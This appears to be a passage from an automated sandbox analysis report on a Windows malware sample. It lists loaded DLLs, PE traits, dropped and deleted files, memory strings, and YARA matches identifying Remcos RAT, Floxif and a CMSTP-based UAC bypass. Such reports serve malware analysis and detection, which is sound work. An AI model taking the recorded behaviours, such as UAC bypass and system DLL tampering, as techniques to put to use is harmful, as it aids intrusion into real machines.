Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll

Source: netutils.dll.0.dr	Static PE information: Number of sections : 19 > 10
Source: netutils.dll.19.dr	Static PE information: Number of sections : 19 > 10

Source: 0vJrK0NCd1.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_FloodFix author = ditekSHen, description = Detects FloodFix
Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Floxif_Generic date = 2018-05-11, author = Florian Roth, description = Detects Floxif Malware, score = de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_FloodFix author = ditekSHen, description = Detects FloodFix
Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Floxif_Generic date = 2018-05-11, author = Florian Roth, description = Detects Floxif Malware, score = de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPED	Matched rule: MALWARE_Win_FloodFix author = ditekSHen, description = Detects FloodFix
Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPED	Matched rule: MAL_Floxif_Generic date = 2018-05-11, author = Florian Roth, description = Detects Floxif Malware, score = de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp, type: DROPPED	Matched rule: Malware_Floxif_mpsvc_dll date = 2017-04-07, hash1 = 1e654ee1c4736f4ccb8b5b7aa604782cfb584068df4d9e006de8009e60ab5a14, author = Florian Roth, description = Malware - Floxif, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

File deleted: C:\Windows \System32\NETUTILS.dll

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows

Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Code function: String function: 04E38153 appears 48 times

Source: 0vJrK0NCd1.exe, 00000000.00000003.371668032.0000000002F14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcrt.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOLEAUT32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLanguagePack vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegdi32j% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSHCORE.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp_win.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSHELL32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePOWRPROF.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameadvapi32.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecomctl32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerpcrt4.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecryptbase.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesecurity.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCFGMGR32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesppcext.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOLE32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefilterLib.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePROFAPI.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -%system32%%systemroot%\system32%sysnative%%windir%%programfilesnative%%systemdrive%\Program FilesCommonFilesDirCommonProgramFilesCommonFilesDir (x86)CommonProgramFiles(x86)ProgramFilesDirProgramFilesProgramFilesDir (x86)ProgramFiles(x86)ProgramDataPublicWIN16WIN32DOSUNKNOWNProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright\StringFileInfo\000004B0\\StringFileInfo\000004E4\\StringFileInfo\040904B0\\StringFileInfo\040904E4\__PROCESS_HISTORYDATABASELIBRARYINEXCLUDESHIMPATCHAPPEXEEXE_TYPEMATCHING_FILESHIM_REFPATCH_REFLAYERFILEAPPHELPLINKDATAMSI_TRANSFORMMSI_TRANSFORM_REFMSI_PACKAGEFLAGCONTEXTMSI_CUSTOM_ACTIONFLAG_REFCONTEXT_REFACTIONLOOKUPNAMEDESCRIPTIONMODULEAPIVENDORAPP_NAMECOMMAND_LINEDLLFILEWILDCARD_NAMEAPPHELP_DETAILSLINK_URLLINK_TEXTAPPHELP_TITLEAPPHELP_CONTACTSXS_MANIFESTDATA_STRINGMSI_TRANSFORM_FILELAYER_DISPLAYNAMECOMPILER_VERSIONACTION_TYPESTRINGTABLEOFFSETSHIM_TAGIDPATCH_TAGIDPREVOSMAJORVERPREVOSMINORVERPREVOSPLATFORMIDPREVOSBUILDNOPROBLEMSEVERITYLANGIDENGINEHTMLHELPIDINDEX_FLAGSFLAGSDATA_VALUETYPEDATA_DWORDLAYER_TAGIDMSI_TRANSFORM_TAGIDFROM_LINK_DATEUPTO_LINK_DATEFLAG_TAGIDCONTEXT_TAGIDRUNTIME_PLATFORMGUEST_TARGET_PLATFORMURLURL_IDAPP_NAME_RC_IDVENDOR_NAME_RC_IDSUMMARY_MSG_RC_IDDESCRIPTION_RC_IDPARAMETER1_RC_IDTAGIDSTRINGTABLE_ITEMINCLUDEGENERALMATCH_LOGIC_NOTAPPLY_ALL_SHIMSUSE_SERVICE_PACK_FILESMITIGATION_OSMONITORING_OFFTELEMETRY_OFFRAC_EVENT_OFFSHIM_ENGINE_OFFLAYER_PROPAGATION_OFFBLOCK_UPGRADEBLOCK_UPGRADE_TYPEREINSTALL_UPGRADEREINSTALL_UPGRADE_TYPEINCLUDEEXCLUDEDLLTIMEMODTIMEFLAG_MASK_KERNELFROM_BIN_PRODUCT_VERSIONUPTO_BIN_PRODUCT_VERSIONDATA_QWORDFLAG_MASK_USERFLAGS_NTVDM1FLAGS_NTVDM2FLAGS_NTVDM3FLAG_MASK_SHELLFLAG_MASK_WINRTFROM_BIN_FILE_VERSIONUPTO_BIN_FILE_VERSIONFLAG_MASK_FUSIONFLAG_PROCESSPARAMFLAG_LUAFLAG_INSTALLPATCH_BITSFILE_BITSEXE_IDDATA_BITSMSI_PACKAGE_IDDATABASE_IDINDEX_BITSINDEXESINDEXMATCH_MODETAGINDEX_TAGINDEX_KEYCONTEXT_PLATFORM_IDCONTEXT_BRANCH_IDFIX_IDAPP_IDKDEVICEKDRIVERMATCHING_DEVICEACPIBIOSCPUOEMKFLAGKFLAG_REFKDATAKSHIMKSHIM_REFVENDOR_IDDEVICE_IDSUB_VENDOR_IDSUB_SYSTEM_IDREVISION_EQREVISION_LEREVISION_GEDATE_EQDATE_LEDATE_GECPU_MODEL_EQCPU_MODEL_LECPU_MODEL_GECPU_FAMILY_EQCPU_FAMILY_LECPU_FAMILY_GECREATOR_REVISION_EQCREATOR_REVISION_LECREATOR_REVISION_GEFORCE_CACHETRACE_PCAPACKAGEID_NAMEPACKAGEID_PUBLISHERPACKAGEID_ARCHITECTUREPACKAGEID_LANGUAGEPACKAGEID_VERSIONFROM_PACKAGEID_VERSIONUPTO_PACKAGEID_VERSIONOSMAXVERSIONTESTEDFROM_OSMAXVERSIONTESTEDUPTO_OSMAXVERSIONTESTEDROUTING_MODEOS_VERSION_VALUEQUIRKQUIRK_TAGIDQUIRK_REFQUIRK_ENABLED_VERSION_LTQUIRK_COMPONENT_CODE_IDQUIRK_CODE_IDQUIRK_OFFELEVATED_PROP_OFFMIGRATION_DATAMIGRATION_DATA_TYPEMIGRATION_DATA_REFMIGRATION_DATA_TEXTMIGRATION_DATA_TAGIDBIOS_BLOCKMATCHING_INFO_BLOCKDEVICE_BLOCKUPGRADE_DRIVER_BLOCKMANUFACTURERMODELDATEUPGRADE_DATAMATCHING_REGREG_VALUE_NAMEREG_VALUE_TYPEREG_VALUE_DATA_SZREG_VALUE_DATA_DWORDREG_VALUE_DATA_QWORDREG_VALUE_DATA_BINARYMATCHING_TEXTTEXTTEXT_ENCODINGMACHINE_BLOCKSHIM_CLASSOS_UPGRADEPACKAGEE
Source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameApphelpj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.422250057.0000000002F44000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/Media